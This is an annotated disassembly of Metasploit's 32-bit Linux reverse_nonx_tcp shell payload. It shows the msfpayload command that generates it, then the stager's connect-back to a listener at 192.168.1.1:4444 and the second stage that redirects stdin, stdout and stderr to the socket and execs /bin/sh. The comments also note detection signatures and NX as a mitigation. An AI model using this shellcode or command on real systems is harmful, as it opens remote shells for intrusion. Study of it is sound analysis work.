reverse_nonx_tcp.rb
root@xstpl:~# msfpayload linux/x86/shell/reverse_nonx_tcp LHOST=192.168.1.1 LPORT=4444 R > reverse_nonx_tcp.bin | |
root@xstpl:~# ndisasm -b32 -p intel reverse_nonx_tcp.bin | |
; Stage 1 of the linux/x86/shell/reverse_nonx_tcp stager shown above
; (32-bit Linux, int 0x80 ABI, ndisasm output: address / bytes / insn).
; It opens a TCP socket, connects back to LHOST:LPORT, read()s the second
; stage straight into its own stack and jumps to it.  "nonx" = it needs an
; executable stack: the final jmp lands on read() data, so NX/DEP (a
; non-executable stack) is the mitigation that breaks this stager.
; Register roles: ebx = socketcall sub-call number, later sockfd;
;                 edi = sockfd (no later instruction or syscall writes it);
;                 ecx = pointer to the argument block / sockaddr on the stack.
; Network-side behaviour a defender can key on: outbound TCP connect followed
; immediately by a ~3 KiB read whose payload is then executed.
00000000 31DB xor ebx,ebx ; ebx = 0
00000002 53 push ebx ; socket arg 3: protocol = 0
00000003 43 inc ebx ; ebx = 1
00000004 53 push ebx ; socket arg 2: type = 1 = SOCK_STREAM
00000005 6A02 push byte +0x2 ; socket arg 1: domain = 2 = AF_INET (not AF_UNIX, which is 1 on Linux)
00000007 6A66 push byte +0x66 ; 0x66 = 102 = __NR_socketcall, the i386 multiplexer: socketcall(int call, unsigned long *args)
00000009 58 pop eax ; eax = 102 (syscall number); ebx = 1 = SYS_SOCKET selects socket()
0000000A 89E1 mov ecx,esp ; ecx -> args[] = {2, 1, 0} = (AF_INET, SOCK_STREAM, 0), built by the three pushes above
0000000C CD80 int 0x80 ; socket(AF_INET, SOCK_STREAM, 0); new fd (or -errno) returned in eax
0000000E 97 xchg eax,edi ; edi = sockfd; parked here because nothing below touches edi
0000000F 5B pop ebx ; pops the domain slot: ebx = 2, reused as sin_family and as the base for SYS_CONNECT
00000010 68C0A80101 push dword 0x101a8c0 ; sin_addr = 192.168.1.1 in network byte order (bytes c0 a8 01 01) -- the LHOST given to msfpayload
00000015 6668115C push word 0x5c11 ; sin_port = htons(4444): 0x115c stored little-endian as 11 5c -- the LPORT
00000019 6653 push bx ; sin_family = 2 = AF_INET (16-bit push)
0000001B 89E1 mov ecx,esp ; ecx -> struct sockaddr_in {sin_family, sin_port, sin_addr}; sin_zero[8] is never written
0000001D 6A66 push byte +0x66 ; 0x66 again: serves as both the syscall number and (below) the addrlen value
0000001F 58 pop eax ; eax = 102 = __NR_socketcall
00000020 50 push eax ; connect arg 3: addrlen = 0x66 = 102 (larger than the 16-byte sockaddr_in, but within what the kernel accepts)
00000021 51 push ecx ; connect arg 2: addr = &sockaddr_in built above
00000022 57 push edi ; connect arg 1: sockfd
00000023 89E1 mov ecx,esp ; ecx -> args[] = {sockfd, &addr, addrlen}
00000025 43 inc ebx ; ebx = 3 = SYS_CONNECT
00000026 CD80 int 0x80 | | ; connect(sockfd, &addr, 102); eax = 0 on success, -errno on failure
00000028 5B pop ebx ; pops the sockfd slot: ebx = sockfd = read() arg 1
00000029 99 cdq ; edx = sign extension of EAX (not AX): 0 after a successful connect
0000002A B60C mov dh,0xc ; edx = 0x0c00 = 3072 = read() count; only correct if edx was 0, i.e. connect succeeded
0000002C B003 mov al,0x3 ; eax = 3 = __NR_read (relies on the upper bytes of eax being 0 from connect's return)
0000002E CD80 int 0x80 ; read(sockfd, ecx, 3072): stage 2 lands in the stack buffer ecx still points at (esp)
00000030 FFE1 jmp ecx ; execute the bytes just received, in place on the stack; faults under NX/DEP
------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
Stage 2 - obtained using gdb | |
------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
; Stage 2 (dumped from the debugger after the read() above): the bytes the
; stager executes from its stack.  It points fds 0, 1 and 2 at the socket and
; then execs /bin//sh, so the shell's stdin/stdout/stderr are the connection.
; Register roles: edi = sockfd inherited from stage 1;
;                 ebx = dup2 oldfd, later the execve filename pointer;
;                 ecx = dup2 newfd loop counter, later argv;
;                 edx = 0, used as NULL/terminator throughout.
; Host-side detection angle: a shell process whose fds 0, 1 and 2 all refer
; to the same TCP socket (e.g. in /proc/<pid>/fd) is the classic reverse-shell signature.
00000000 mov ebx,edi ; dup2 arg 1: oldfd = sockfd (edi still holds it from stage 1)
00000002 push 0x2 ; loop counter starts at 2
00000004 pop ecx ; ecx = newfd, walks 2 (stderr), 1 (stdout), 0 (stdin)
00000005 push 0x3f ; 0x3f = 63 = __NR_dup2; re-pushed every iteration because int 0x80 overwrites eax
00000007 pop eax ; eax = 63
00000008 int 0x80 ; dup2(sockfd, ecx): fd ecx now refers to the socket
0000000a dec ecx ; next lower fd; SF becomes set when ecx goes from 0 to -1
0000000b jns 000000005 ; loop while ecx >= 0: three iterations, exits with ecx = -1
0000000d push 0xb ; 0xb = 11 = __NR_execve
0000000f pop eax ; eax = 11
00000010 cdq ; edx = sign extension of EAX = 0 (eax = 11); doubles as NULL for envp and the terminators below
00000011 push edx ; NUL terminator of the filename string
00000012 push 0x68732f2f ; "//sh" (bytes 2f 2f 73 68 in memory)
00000017 push 0x6e69622f ; "/bin" (bytes 2f 62 69 6e)
0000001c mov ebx,esp ; execve arg 1: filename = "/bin//sh" -- padded to 8 bytes so two pushes hold it; the kernel treats "//" as "/"
0000001e push edx ; argv[1] = NULL (terminates argv; envp is the register edx = NULL, not this push)
0000001f push ebx ; argv[0] = pointer to "/bin//sh"
00000020 mov ecx,esp ; execve arg 2: argv = {"/bin//sh", NULL}; arg 3: edx = envp = NULL
00000022 int 0x80 | ; execve("/bin//sh", argv, NULL): does not return on success; the shell inherits the socket as fds 0-2